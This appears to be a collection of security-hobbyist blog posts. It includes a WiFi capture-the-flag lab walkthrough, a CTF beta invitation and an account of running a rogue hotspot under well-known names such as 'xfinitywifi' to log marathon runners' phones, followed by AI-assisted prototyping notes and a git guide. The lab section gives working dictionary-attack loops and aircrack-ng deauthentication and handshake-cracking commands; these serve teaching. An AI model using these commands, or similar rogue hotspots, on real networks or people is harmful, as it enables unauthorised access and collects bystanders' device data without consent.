WiFi Password Cracking Challenge

In this lab, you will learn how to brute force the WiFi credentials of the CTF_LAB access point. This is the first challenge in the WiFi CTF competition and teaches fundamental concepts of password security and dictionary attacks.

Challenge Objectives:

  • [ ] Find the wifi network
  • [ ] Manually guess some passwords
  • [ ] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

BEFORE YOU START

Prerequisites:

  1. The CTF Lab Raspberry Pi must be powered on and running
  2. The WiFi Access Point should be broadcasting (wait ~1-2 minutes after power-on)
  3. You should have a laptop or mobile device capable of WiFi scanning
  4. IMPORTANT: DO NOT PERFORM THIS WORK ON A CORPORATE OR MANAGED LAPTOP. Use a personal computer you own, as security/IT teams may flag hacking tools as malicious software

What You’ll Learn:

  • WiFi network reconnaissance
  • Password dictionary attacks
  • Command-line automation with loops
  • The importance of strong passwords

Discovering the WiFi Network

The Raspberry Pi CTF Lab operates as a WiFi access point that you can practice ethical hacking against. About 1-2 minutes after it is powered on, it will broadcast a WiFi network with the SSID (network name):

CTF_LAB

Finding the Network

You can discover this network from any WiFi-capable device:

On Mobile Devices (iOS/Android):

  • Open Settings → WiFi
  • Look for the network named CTF_LAB in the available networks list

On Mac:

  • Click the WiFi icon in the menu bar
  • Look for CTF_LAB in the network list

On Linux:

# Scan for available networks
nmcli device wifi list

# Or use iwlist
sudo iwlist wlan0 scan | grep -i "ctf_lab"

On Windows:

  • Click the WiFi icon in the system tray
  • Look for CTF_LAB in the available networks

Progress:

  • [x] Find the wifi network
  • [ ] Manually guess some passwords
  • [ ] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Manually Guessing a Password

Now that you’ve found the CTF_LAB network, you can try connecting with some common passwords. Try a few guesses manually:

  • password
  • 12345678
  • admin
  • ctf
  • supervisor

Unless you’re very lucky (or very strategic), you probably won’t guess it immediately. This demonstrates an important security principle: password strength matters.

Why Dictionary Attacks Work

You might wonder why manual guessing is ineffective, but a dictionary attack can succeed. Here’s the key insight:

Password Space vs. Memorable Passwords

  • Total possible passwords: With lowercase letters, uppercase, numbers, and symbols, an 8-character password has over 200 trillion possible combinations
  • Memorable passwords: Most people choose passwords they can remember, which drastically reduces the search space to maybe a few million common choices

Since humans tend to use memorable passwords (dictionary words, names, common phrases), attackers can:

  1. Start with a list of commonly used passwords
  2. Try these first before resorting to true brute force
  3. Often succeed without testing billions of random combinations

This is why password managers and randomly generated passwords are so important for real security!

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [ ] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Finding a Dictionary

Let’s try to find a common password list. You can do this by searching google for the following phrase:

“10k most common passwords”

you should see a link to a github repository show up that’s at the following url:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

Browse to the page. Click on the button labeled “raw” on the right side of the page. You can then save this file to your computer by clicking on the file menu for the browser and selecting “save as.”

alt text

When you click on Save as, a dialog will show up:

alt text

You’ll need to create a directory for starting our hacking. You can do this from within the dialog by clicking on New Folder. Name it HackingLab and click Create.

alt text

Then go ahead and click on save. You’ll now have a file called “10k-most-common.txt” in the Hacking lab direcotry. Let’s learn to view the file from the command line. Let’s use spotlight to open up the terminal by hitting command and space simultaneously, and then typing in terminal:

alt text

Change into your HackingLab directory by typing the following:

cd HackingLab Now that you’re in the HackingLab directory, let’s view the password file:

more 10k-most-common.txt

You’ll see that each row of the file contains a password.

alt text

Hit q to leave the more command.

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [x] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Finding a Command to Connect to WiFi Networks

Now we have a password list – we need to figure out how to automate connection attempts. The approach varies by operating system:

Mac OS

Search Google for “Connect to wifi from command line mac” to find resources. Here are the key commands:

Scan for networks:

/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

Connect to a network:

networksetup -setairportnetwork en0 <SSID_OF_NETWORK> <PASSWORD>

Try running the airport -s command to see available networks. You should see CTF_LAB in the list.

Testing a single password:

networksetup -setairportnetwork en0 CTF_LAB somepassword

When you run this, your WiFi will disconnect temporarily. If the password is wrong, you’ll see an error message.

Linux

Using nmcli (NetworkManager):

# Scan for networks
nmcli device wifi list

# Connect to network
nmcli device wifi connect CTF_LAB password somepassword

Using wpa_supplicant (manual):

# Create config
wpa_passphrase CTF_LAB somepassword > /tmp/wpa.conf

# Connect
sudo wpa_supplicant -B -i wlan0 -c /tmp/wpa.conf

Windows (PowerShell)

# View available networks
netsh wlan show networks

# Connect to network
netsh wlan connect name="CTF_LAB"

For automated password testing on Windows, you’ll need to create a WiFi profile XML file for each password attempt, which is more complex than on Mac/Linux.

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [x] Find a dictionary
  • [x] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Automating the Dictionary Attack

Now for the exciting part – we’ll automate the password testing using a loop that tries each password from our dictionary file!

Mac OS Script

At the terminal, type the following lines and hit Enter at the end of each line:

while read passwordfilevalue; do
  networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"
  ifconfig en0 | grep inet
  echo "Tried password: $passwordfilevalue"
done < 10k-most-common.txt

What this script does:

CommandPurpose
while read passwordfilevalue; doCreates a loop that reads the password list one row at a time
networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"Attempts to connect to CTF_LAB using the current password
`ifconfig en0grep inet`
echo "Tried password: $passwordfilevalue"Prints the password we just tried
done < 10k-most-common.txtReads from the password dictionary file

How to detect success:

  • When you see an inet line with an IP address (like inet 192.168.4.100), you’ve connected successfully!
  • The password printed immediately before the IP address is the correct one
  • The CTF_LAB network uses the 192.168.4.0/24 subnet, so successful connections will show an IP like 192.168.4.X

Linux Script

while read passwordfilevalue; do
  nmcli device wifi connect CTF_LAB password "$passwordfilevalue" 2>&1
  if [ $? -eq 0 ]; then
    echo "SUCCESS! Password found: $passwordfilevalue"
    break
  else
    echo "Failed password: $passwordfilevalue"
  fi
done < 10k-most-common.txt

Advanced: Using Aircrack-ng Suite (Linux)

For a more sophisticated approach, you can capture the WPA2 handshake and crack it offline:

# 1. Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0

# 2. Scan for networks
sudo airodump-ng wlan0mon

# 3. Capture handshake (note the channel and BSSID of CTF_LAB)
sudo airodump-ng -c <channel> --bssid <BSSID> -w ctf_capture wlan0mon

# 4. In another terminal, deauth a client to force handshake
sudo aireplay-ng -0 1 -a <BSSID> wlan0mon

# 5. Once handshake is captured, crack it
aircrack-ng -w 10k-most-common.txt ctf_capture-01.cap

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [x] Find a dictionary
  • [x] Find a command to use to connect to wifi networks
  • [x] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [x] Launch the attack and discover the credential

What You Should See

As the script runs, you’ll see:

  • Each password being tried
  • Connection errors for wrong passwords
  • When successful: An IP address in the 192.168.4.X range appears!

The password is somewhere in that 10k common password list. Watch the output carefully to catch the successful connection.

Hint: Think about common passwords related to oversight, management, or authority. The CTF_LAB password is a common English word.

Next Steps

Once you’ve successfully connected to the CTF_LAB WiFi network, you’re ready to:

  1. Scan the network to find a registration resource
  2. Register
  3. Access the dashboard
  4. Begin exploring the web services and system challenges
  5. Start earning points!

Congratulations on completing your first challenge! You’ve learned:

  • WiFi reconnaissance techniques
  • The power of dictionary attacks
  • Why password strength matters
  • Basic bash scripting for automation

Hands-On WiFi Security CTF: Beta Test Experience

Where are you in your security journey? Let’s find out together.

I’m inviting you to beta test my new WiFi security CTF — a deliberately vulnerable Raspberry Pi network that gives you a safe space to truly test what you know, discover what you’re capable of, and chart your path forward.

Visit https://wifictf.patrickmccanna.net to learn more and sign up.

If you’re on the fence about attending- here’s a summary of what you can expect to experience. Be sure to signup, then show up to Big Block Brewery in Carnation WA on Sat. Nov 29th between 1-4 pm.

Show up with your laptop or phone- and search for the wifi network:

The Challenge

A password-protected WiFi network called “CTF_LAB” is your starting point. Your mission:

  1. Gain access to the WiFi network — apply wireless exploitation techniques
  2. Enumerate and understand the network — map what’s running and where
  3. Identify and exploit vulnerabilities — put your knowledge into practice
  4. Achieve persistent root access — prove you can chain exploits effectively
  5. Earn points for successful exploitation — not just for finding things, but for making them work

This lab rewards execution. You get points when your exploits actually work — because that’s what matters in the real world.

Why This Lab Exists

You deserve to know what you’re actually capable of. Not what you think you can do, or what you’ve read about — what you can execute when it counts. This lab gives you that clarity.

Growth happens at the edge of your abilities. This CTF is designed to meet you wherever you are: if you’re just starting out, you’ll learn foundational techniques. If you’re experienced, you’ll get to validate your skills and find the gaps you didn’t know existed. Both are valuable.

Real scenarios build real skills. The vulnerabilities here mirror actual IoT security assessments. The techniques that work here will serve you in professional security work, research, or wherever your curiosity takes you.

Your Experience

You’ll begin outside the network. Getting in might mean capturing and cracking a WPA handshake, or it might mean taking the shortcut and focusing on what comes next — it’s your call.

Once you’re on the network, the real exploration begins. What’s running? Where? How can these services be leveraged? Each vulnerability you discover and exploit opens doors to the next challenge.

This is where you’ll learn the most about yourself. Can you enumerate effectively? Do you recognize exploitation opportunities when you see them? Can you chain attacks together? These aren’t just technical questions — they’re diagnostic. The answers tell you exactly what to learn next.

Hit a wall? The lab includes embedded educational guides that explain concepts and techniques without robbing you of the “aha!” moment. You’ll still need to apply what you learn — because that’s where growth happens. And I’m here if you need a nudge in the right direction.

Who This Is For

This lab is for anyone who’s serious about understanding their own capabilities:

  • Learners who are ready to find out if they can actually do what they’ve been studying
  • Practitioners who want an honest assessment of where they stand
  • The curious who wonder if they’re as capable as they hope they are
  • The ambitious who want to identify what to master next

What You’ll Discover

Every person who takes on this challenge learns something different:

  • You might discover you’re further along than you thought
  • You might find unexpected strengths in areas you hadn’t focused on
  • You might identify specific gaps that, once filled, will level up your entire skillset
  • You might surprise yourself with what you can figure out when the pressure is on

All of these outcomes are wins. Knowing where you stand is the foundation for getting where you want to go.

Begin Your Assessment

The beta test is live. Bring your laptop, your curiosity, and your willingness to be honest with yourself about what you know.

Starting your security journey? This lab will show you what’s possible and give you a clear path forward.

Already experienced? This is your chance to validate your skills against realistic scenarios and find your next growth edge.

Visit wifictf.patrickmccanna.net to participate.

I’m excited to see what you discover!

Reproducible Sneaky Wifi Part 2

Last week I left you with a nail-biter. I ran a sneaky wifi network near a weird marathon in 2018 and I captured close to 200 devices. I reproduced the experiment this fall- how’d it go in 2025? Terrible in some regards, but awesome in terms of prototyping acceleration. An experiment that took 2 months in 2018 took me 4 days in 2025.

Time lapse of runners

The Bad

In the 2025 experiment, I caught a grand total of 18 devices.

Does this mean mobile phones are more secure? Was it the exact same experiment? No!

Low Participant Turnout: My Wifi Hotspot was active starting at 7 am. The marathon was scheduled to start at 8 am. We didn’t see a single runner till ~9:15 am. When runners did start arriving, the quantity of runners was limited compared to past years. The 2018 marathon spanned two days. The race was only one day this year. The participant cohort of runners was significantly smaller than in years past.

Bad SSID choices: This attack depends upon your ability to anticipate a wifi ssid that your targets have an affinity for. The wifi SSID i used in 2018 wasn’t going to work because it has been deprecated. I went with “Starbucks WiFi” initially, but this only caught 2 devices. The lack of “Starbucks WiFi” tuned devices is an interesting indicator of how times have changed. It used to be that mobile phone owners needed to attach to wifi to use email/browse the web with their phones. This was because cellular networks did not have unlimited data, and so you either ran out of data for the month or you were hit with a large cellphone bill if you used cellular for data. People used to go to coffee shops to “work” on their phones and laptops. Now you’re really there to socialize or caffinate. I also wonder if Starbucks’ popularity has declined. In the last 10 years, I’ve only drank Starbucks out of necessity.

So after a couple of hours of watching only 2 attaches, I yielded to temptation and changed the SSID to “xfinitywifi.” The xfinitywifi ssid is a controversial wifi network vended by Comcast, exclusive to comcast customers.

You can use wigle.net to see the most popular active SSIDs:

Changing to use xfinitywifi felt like desperation! Comcast does not have much presence in Snoqualmie valley. I reasoned that most of the runners were probably coming from cities where Comcast is dominant- e.g. Bellevue, Issaquah and Redmond. I managed to catch 16 more devices over the next 4 hours. The count was so small I didn’t bother to keep my logs. But here are some screenshots to give you a feel for what I experienced:

Raspberry Pi with AWUS036ACH WiFi adapter & home built dual yagis
Paperwhite display
Custom status monitor


This experiment agitated me greatly. I know there are still problems related to wifi offloading- but I only caught 18 devices. I didn’t spend enough time researching SSIDs and the end result was low attaches.

Despite my grumpiness about the data, this experiment was a major success.

Did you notice the external Wifi Adapter above? How about the nice Paperwhite display presenting status of the device. My monitoring script was far more sophisticated than a tail of a hostapd logs. I didn’t have to write this code or fiddle with hostapd configurations or nftables rules. I didn’t have to find the right kernel headers and compile wifi drivers. I didn’t have to flex my terrible design skills. I knew the features I wanted and I gave my agents direction on how to deploy the features.

I was able to successfully produce an IoT prototype with complex hardware dependencies in 4 days.

The Good:


I implemented a working prototype of a custom wifi hotspot with a paperwhite display, an external wifi adapter & a Yagi wifi antenna in 4 days.

Methodology

Claude Code & Pre-prompting strategies

I leveraged Claude code for most of my work. I created a working directory invoked Claude with a 1,500 line pre-prompt for requirements analysis and planning. This pre-prompt produced ansible playbooks that take advantage of my Firmware Development caching containers. The pre-prompt addresses topics related to Requirement Exploration, Architecture Safety, Known Good Deployment Patterns, Domain Specific Knowledge and Documentation & Maintenance. I’ve been iterating on this prompt for about 6 weeks through applications on about 5 other projects. I constructed a separate pre-prompt of 166 lines that handles Deploying code, Code analysis, system access, frameworks for deploying code & systematic troubleshooting and refactoring the code to address discovered defects.

Development Loop

The normal lifecycle of developing a reliable working prototype seems to take about 3-4 build cycles.

My agent would serially perform the following operations during the build process:

  • Initiate a build
  • Discover defects during build process
  • Troubleshoot them on the recipient system
  • Make corrections to the original build playbooks
  • Resume the build at the corrected defect
  • Complete a working build.

If the build experienced errors, I waited to get a complete build and then started again on fresh recipient image. I kept seeing improvements until the build process ran reliably without errors.

Throttling

My biggest challenge was rate limiting:

My agents hit my 5 hour Anthropic token limit on the $20 plan in about 2 hours. During this 4 day period, I scheduled my day around throttling limits. I tried to make sure that some building happened while I slept. Two days before the marathon, I upgraded to the $200 plan. My iOS screen time report was 1 hour during that week.

I didn’t have to write any code to make this project work. That’s not to suggest that anybody could do this experiment. I was successful because I knew exactly what software libraries I wanted to see deployed and how I wanted them tuned. I regularly had to intervene when the agents proposed bad plans. But I’m now approaching a point where my single board computer development processes are automated. It felt like having a mildly competent apprentice.

Over the last few years, I’ve been able to build a range of Raspberry Pi Prototypes. All of them were a labor of large effort. My build process made prototyping faster, but it still took me several months to work out the details of various project:

Making reproducible builds was expensive and typically took 2-3 months. I’d steal spare time on evenings or weekends to work on projects. The greatest costs come from the testing & validation needed to create durable, reproducible firmware images.  With a combination of tasteful pre-prompts, custom agents & an automated build process I can turn around reproducible firmware builds in less than a week.



1. Software & Hardware Testing Houses

You need repeatable, cost-effective environments to validate new software and hardware under real-world conditions, but setting up and tearing down test rigs is slow, inconsistent, and prone to configuration drift.


2. Managed Security Service Providers (MSSPs)
You need deployable, trusted network nodes inside customer environments for monitoring, detection, and incident response — but sourcing, configuring, and reproducing reliable hardware platforms across dozens of clients eats up valuable engineering time.


3. IoT Manufacturers

You want to prove out your next device concept quickly, with working prototypes that demonstrate connectivity, edge processing, and security — but your in-house teams are bottle-necked by long development cycles and unpredictable integration issues.

4. Agricultural & Rural Networking Providers

You need rugged, affordable devices to extend connectivity into fields, barns, and remote communities — but commercial gear is overpriced, hard to customize, and not designed for rapid prototyping or deployment in challenging environments.

5. Telecom & Network Operators
You need cost-effective, rapidly deployable edge devices for monitoring network performance, testing bandwidth in rural or urban environments, or validating new customer premises equipment—but traditional hardware procurement cycles are too slow and expensive.

6. Smart City & Infrastructure Providers
You’re deploying IoT devices to manage traffic lights, utilities, or environmental sensors across a city, but you need quick, low-cost prototypes to validate integrations before scaling to tens of thousands of units.

7. Educational & Research Institutions
Your students or researchers need reproducible, documented environments for experimentation with hardware, networking, or AI, but setting up reliable builds consumes valuable teaching and research time.

8. Healthcare & MedTech Device Innovators
You’re exploring connected health devices—remote patient monitors, smart diagnostic tools, or secure data collection endpoints—but you need a prototype that proves functionality while meeting strict reliability and security requirements.

9. Defense & Public Safety Contractors
You’re tasked with rapidly developing ruggedized, secure edge devices for field communication, surveillance, or sensor fusion, but your internal teams can’t keep pace with the prototyping demands.

10. Environmental & Energy Monitoring Firms
You need distributed, low-power devices to collect data in harsh or remote environments—forests, farms, offshore rigs, or mines—but your current prototypes fail due to durability or reproducibility issues.

11. Media & Event Production Companies
You want portable, reliable devices for live-streaming, crowd analytics, or on-site Wi-Fi provisioning at concerts and sporting events, but consumer gear isn’t flexible enough and enterprise hardware is overkill.

12. Transportation & Logistics Providers
You’re experimenting with fleet tracking, warehouse automation, or smart inventory systems, but you need a way to test edge hardware integrations quickly before committing to full-scale rollouts.

13. Industrial Automation & Robotics
You need controllers and monitoring systems for robots, conveyors, or factory IoT sensors, but the cost and time of custom PLCs and proprietary systems make it hard to experiment quickly.

14. Consultancies & Systems Integrators
You’re responsible for stitching together hardware and software for your clients, but you lack a streamlined way to spin up reproducible prototypes that demonstrate proof-of-concept value quickly and reliably.

Sneaky wifi near weird marathons (Part 1)

In 2018, I ran a Wifi network with a well known public SSID off a raspberry pi and ended up catching lots of marathoner phones. My network was not configured for sniffing- purely attaching. Phones with the right WiFi settings would automatically attach to the WiFi network.

My interest was in exploring whether phones promiscuously attach to WiFi networks they recognize. My network didn’t vend Internet access- which means I couldn’t spy on people’s traffic. But I did vend DHCP to anyone who tried to connect, which enabled me to gather some data about devices that attached.

The hotspot wasn’t operated from my house- I had to do a little work to get the network to the runners. I live in the pacific northwest. Rain is an issue. Back then, I didn’t know enough antenna theory to broadcast long distances, so my setup was janky. If you looked around, you’d see a Tupperware box left behind during some spring cleaning.

After several weeks of iteration, I was ready for the marathon. The race is called “Beat the Blerch.” The name is a tribute to the desire to quit. Running is about ignoring that desire. The organizers have cake stations and couches out on our trail to tempt people into taking a break. Some runners wear inflatable t-rex costumes. Pretty gross!

I turned my hotspot on and started looking at logs. When you monitor the logs of HostAPD, you can see the MAC addresses of the devices that attach. This information can be used to identify the device type that connected. Over the course of the marathon, I saw an interesting diversity of devices attach:

You can see that Apple dominated the running community. It’s interesting to see a Blackberry device in 2018. Someone was in a committed relationship with their phone!

This project worked because carriers have a “WiFi offload” strategy. Unlimited data is relatively new. Carriers were still scrambling to provide transport that met the demand of customers. Phones have been tuned to attach to recognized networks in order to offload traffic during metering. I suspect that some day in the future, data caps will get reintroduced thanks to the popularity of 4k streams on 3 inch displays. Time will tell.

There is another fun property of my data! I can graph the attachment rate of runners passing during the marathon. The slope is steep when we’re at the start of the race. Competitive runners quickly disappear and the slope goes gradual. Our graph is pretty boring till we get to the end of the marathon. Is this because the slowest runners don’t give up?

NO! There’s a 10k happening as well! It happens to turn around at the end of the trestle. The slope in our graph declines because the 10k participants start showing up. Short races are more popular! We see a much more steady rate of attaches as a result. As we move to the right, the marathoners are on their return. The tangent-like shape isn’t because of runner resilience. It’s showing you that the steepest slopes are representing folks doing harder things.

The run spanned two days. The second day was rainy, which significantly dampened participation:

On day 1 I caught about 155 devices, but day 2 only brought us about 40.

This was a fun project- but it was scrappy. When I started off, I didn’t really know how to configure hostAPD or DNSMasq. I had to figure out a bunch of implementation details on the fly. I didn’t document my project. It took several weeks and I was lucky. I had enough saved logs and sed magic to generate a cool looking set of graphs. But compiling the WiFi drivers was a pain. You can see my setup had to be in close proximity to the race. The antenna set was not optimized for outdoor transmission. It was not a reproducible project- and it certainly wasn’t stable.

2025

The annual Blerch marathon ran past my house earlier this month.

Four days before the event, I put a challenge in front of myself: Create a reproducible version of the ‘catcher’ project using my LLM-supported automation

I’m more experienced now and consequently, less interested in proving vulnerabilities. I’d prefer to build enduring solutions. In this case, my goal is rapid delivery of IoT prototypes and projects. Anecdotally, I’ve heard prototyping a first iteration of complex IoT takes between 3-9 months. I would consider developing a project requirements doc, implementing code, implementing unit & integration tests and delivering a working implementation in scope for the first run of a prototype. Keep in mind: there’s considerably more work involved to get from concept to market.

I’ve been building what I guess are my own custom AI “agents” for almost a year. I’ve had some intuition about using different tools for quickly building firmware images that were useful. I’ve recently started experimenting with creating agents that actually deploy and troubleshoot deployments. It’s been working so well that it’s starting to feel weird. Building complex hardware systems quickly shouldn’t be this fast. I suspect I can turn a device around in a single day.

My “Win conditions” are more about creating a reproducible project than proving vulns. I want to prove that I can quickly turn around a complex project prototype. “Complex” in this case means we include peripherals and inter-component integration. This boils down to 3 goals

  1. Demonstrate the implementation of an external wifi adapter for vending the wifi network. This would require autonomous troubleshooting and configuration tasks related to wifi configuration. There are complex design and implementation decisions that come with activating AP Mode. An AI Agent can speed run that process. It would also demonstrate an Agent’s ability to troubleshoot driver compilation errors.
  2. Implement a paperwhite display that could present status of the pi. This would include status of the wifi network and any attached devices. Most IoT has some kind of interface that people will interact with. I wanted to demonstrate that a peripheral-based UI can be implemented with agents.
  3. Implement the whole project via custom deployment & troubleshooting agents. When I did this last time, I was in my office on weekends and evenings at the expense of spending time with my kids. I wanted to wield my AI towards productivity gains.

How did it work out? Hit refresh for about a week and I’ll include a link to Part 2!

Friday Claude notes

Summary of what we accomplished:

  1. Fixed SSH firewall lockout – Added comprehensive SSH safety rules to iptables
  2. Resolved dnsmasq service issues – Removed problematic systemd override, fixed configuration
  3. Created missing template files – Added device_registration.py.j2 and deployment_record.json.j2
  4. Removed UFW conflicts – Eliminated redundant firewall configuration
  5. Fixed APT sources – Corrected template variables with proper Debian bookworm repositories
  6. Recovered from NetworkManager disability – Fixed and prevented future networking loss
  7. Learned important lessons – Documented the anti-pattern of using ignore_errors as a lazy fix The Device Catcher deployment is now complete and the playbook is more robust for future runs. The system will properly handle
    single WiFi interface setups and maintain network connectivity through reboots. Good luck with your marathon device tracking project!

What’s the current todo list?

● The todo list is now empty! We’ve completed all tasks:

✅ Fixed firewall rules blocking SSH on wlan0
✅ Removed lessons learned file processing from Ansible playbooks✅ Fixed or excluded documentation role with circular references
✅ Fixed dnsmasq configuration to work properly
✅ Fixed networking disabled after reboot
✅ Updated playbook to handle single WiFi interface systems

All deployment issues have been resolved and the Device Catcher system is successfully deployed.

Guidelines for getting better at GIT

I’ve struggled with my git workflows. In the past, I found that I have a bad habit of dramatically editing my projects when I really should fork them. I’ve been putting some effort into building better git habits to help me avoid these situations. I started off being familiar with git init, git commit and git push, but stash and other commands were beyond my grasp. I’ve done some prompt engineering to develop guardrails for the types of development decisions that should be handled with some of the more advanced git use cases. Maybe these will help you!

A couple of safety nets for immediate use:

  • Always be able to undo:
    • See anything you’ve done: git reflog
    • Lightweight “save point”: git tag backup-$(date +%Y%m%d-%H%M%S)
      Portable snapshot (off-repo backup): git bundle create backup.bundle --all
  • WIP parking lot: prefer WIP commits on a throwaway branch over stash when work will last more than a few minutes. You can do this with the following command:
# from anywhere with uncommitted changes
b="wip/$(date +%Y%m%d-%H%M%S)"; \
git switch -c "$b" && git add -A && git commit -m "WIP: parked" --no-verify && git switch -

1. “Am I rewriting the product?” → Fork vs Branch

  • Use a fork (new repo) when:
    • You’re changing project direction, licensing, or governance.
    • You’ll diverge long-term from upstream (different roadmap) and want to pull upstream occasionally but not merge back regularly.
    • You need independent release cadence and issue tracking.
    • ✨ Tools: git remote add upstream <url>, then git fetch upstream and selective cherry-picks back.
  • Use a new branch (same repo) when:
    • It’s still the same product, just a big feature or refactor.
    • You want CI, PR review, and discoverability to stay in the same place.
    • ✨ Tools: git switch -c feature/refactor-auth, maybe behind a feature flag.

Quick rule: If you’d be uncomfortable merging it back “as-is,” consider a fork. If you’d merge it behind a flag after review, it’s a branch.


2) “Am I about to experiment wildly?” → Throwaway branch + worktree

  • Create a scratch branch you can nuke anytime: git switch -c spike/new-idea # or keep working tree separate so you don't juggle unstaged changes: git worktree add ../proj-spike spike/new-idea
  • If it works, cherry-pick useful commits onto a clean feature branch: git log --oneline # find hashes git switch feature/refactor git cherry-pick <hash1> <hash2>
  • If it fails: git switch main && git branch -D spike/new-idea && git worktree remove ../proj-spike

When to prefer git worktree: When you want two branches checked out simultaneously (e.g., bugfix and main) without stashing.


3) “My working tree is messy, I need to hop branches” → Stash vs WIP commit

  • Use stash for quick context switches and truly throwaway partial work: git stash push -m "WIP: parser tweak" # saves staged+unstaged git switch main && git pull git switch feature/parser git stash pop # apply and drop (use `apply` to keep in stash)
    • Keep it organized: git stash list, git stash show -p stash@{2}
    • Partial stash: git stash -p
  • Use a WIP commit if:
    • Work spans hours/days or you need team visibility & CI.
    • You want history and easy recovery: git add -A && git commit -m "WIP: parser spike (not for merge)"
    • Later clean history with an interactive rebase (see §7).

Rule of thumb: Minutes → stash. Hours/days → WIP commit.


4) “I’ve started a big refactor on top of stale main” → Rebase early, merge late

  • Keep your feature branch fresh to minimize painful conflicts later: git fetch origin git rebase origin/main # replay your commits onto latest main # if conflicts: resolve, then git rebase --continue
  • Prefer rebase for private branches; prefer merge for shared/history-sensitive branches.

Guardrail: If the branch is already public and teammates might have based work on it, avoid rebasing it; use git merge origin/main.


5) “I need to land part of a large change safely” → Split & cherry-pick

  • Break work into small, reviewable commits and land enabling changes first:
    • Extract a pure “rename/move” commit (no logic change).
    • Land new interfaces behind feature flags with no callers.
  • Use git cherry-pick to move those low-risk commits into separate PRs: git cherry-pick <hash> # keep author/date and exact diff

6) “I must keep risky code from reaching users” → Feature flags + release branches

  • Main stays releasable; incomplete work guarded by flags.
  • Release branches cut from main when stabilizing: git switch -c release/1.4.0
    • Only bug fixes cherry-picked into release branch.
    • Tag final release: git tag -a v1.4.0 -m "Release 1.4.0" && git push --tags

7) “My history is noisy; I want it clean before merging” → Interactive rebase

  • Squash fixups, rename messages, reorder commits: git fetch origin git rebase -i origin/main # Use: pick / reword / squash / fixup
  • Use --autosquash with fixup! commits: git commit --fixup <hash> git rebase -i --autosquash origin/main

Guardrail: Only rewrite history on branches no one else has pulled.


8) “I need to find where a bug was introduced” → Bisect

git bisect start
git bisect bad HEAD
git bisect good v1.3.2     # or a known-good commit
# Git checks out midpoints; you run tests and mark them:
git bisect good | bad
git bisect reset

Automate with a test script: git bisect run ./ci/test.sh


9) “I want to share part of the repo or vendor another repo” → Subtree vs submodule

  • Subtree (simple, self-contained code copy you occasionally sync):
    • Pros: no extra checkout step for consumers; normal commits.
    • Cons: merges can be larger; history mixed.
  • Submodule (true nested repo):
    • Pros: clean separation, track exact external revisions.
    • Cons: extra steps for users/CI (--recurse-submodules), more footguns.

Guardrail: If your consumers shouldn’t think about extra steps, prefer subtree.


10) “Repo is huge; I only need a slice” → Sparse checkout

git sparse-checkout init --cone
git sparse-checkout set src/api docs

Great for monorepos or to focus on one component.


11) Everyday branch hygiene (golden rules)

  1. Create a branch early for any work > 15 minutes.
    git switch -c feature/<short-purpose>
  2. Sync daily: git fetch && git rebase origin/main (if private).
  3. Commit small, purposeful changes with present-tense messages.
  4. Keep main green; hide incomplete features behind flags.
  5. Use throwaway spikes for experiments; keep or delete sans guilt.
  6. Tag releases and cut release branches for stabilization.
  7. Never rebase shared branches; merge instead.

Minimal command playbook (copy/paste friendly)

# Start a feature
git switch -c feature/login-oauth
# Work... then sync with latest main (private branch)
git fetch origin
git rebase origin/main

# Park work temporarily
git stash push -m "WIP: oauth redirect"
# or (longer): WIP commit
git add -A && git commit -m "WIP: oauth redirect not wired"

# Create a spike in a separate working directory
git worktree add ../proj-oauth-spike spike/oauth
# ...experiment...
git worktree remove ../proj-oauth-spike && git branch -D spike/oauth

# Prepare a clean history before PR
git rebase -i origin/main   # squash/fixup

# Split out a safe helper into a separate PR
git cherry-pick <hash-of-helper-commit>

# Release flow
git switch -c release/1.5.0
git tag -a v1.5.0 -m "Release 1.5.0"
git push origin release/1.5.0 --tags

# Disaster recovery
git reflog                  # find the good state
git reset --hard <hash>

Helpful .gitconfig aliases (speeds up the guardrails)

[alias]
  co = checkout
  sw = switch
  br = branch
  st = status -sb
  lg = log --oneline --decorate --graph --all
  rb = rebase
  rbi = rebase -i
  fp = fetch --prune
  pop = stash pop
  ap = stash apply
  aa = add -A
  cm = commit -m
  fix = commit --fixup
  autosquash = !git rebase -i --autosquash
  unstage = reset HEAD --
  wip = !git add -A && git commit -m 'WIP'

What to do when you “feel the drift”

Use this quick decision tree:

  • “This is becoming a different product/vision.”Fork.
  • “This is a big refactor or feature but same product.”Feature branch, guard with flags.
  • “I want to try something risky fast.”Spike branch (ideally via worktree), later cherry-pick.
  • “I must context-switch now.”
    • Short: stash
    • Long: WIP commit
  • “History is messy before merge.”Interactive rebase (private only).
  • “Need to ship, but not everything is ready.”Release branch + cherry-pick fixes.
  • “Bug appeared somewhere in history.”bisect.

WOW! First mostly autonomous build!

Yesterday (Sunday) I fiddled with the captive portal on the instant community wifi build. My goal was to improve the experience for ios devices. iOS devices don’t support the camera apis in a captive portal window. I started working with claude to get this built, but the app ended up breaking. I had to start over.

I had problems with writing the recipient image on my linux laptop. for some reason, the devices aren’t connecting to wifi when I have them powered up with a build from the linux laptop. The ripped images from my iMac do work, however. I built a new 8gig image and ripped 10 cards on the etcher.

When the images were finally ready, i made a fateful choice. Instead of using the container, I tried to do the deployment from the host OS. The last time I did this it failed because the essential.yml file’s ordering was broken. I’d corrected this a couple of days ago, and retried the experiment. THIS WAS FAR MORE PRODUCTIVE!

Lessons Learned

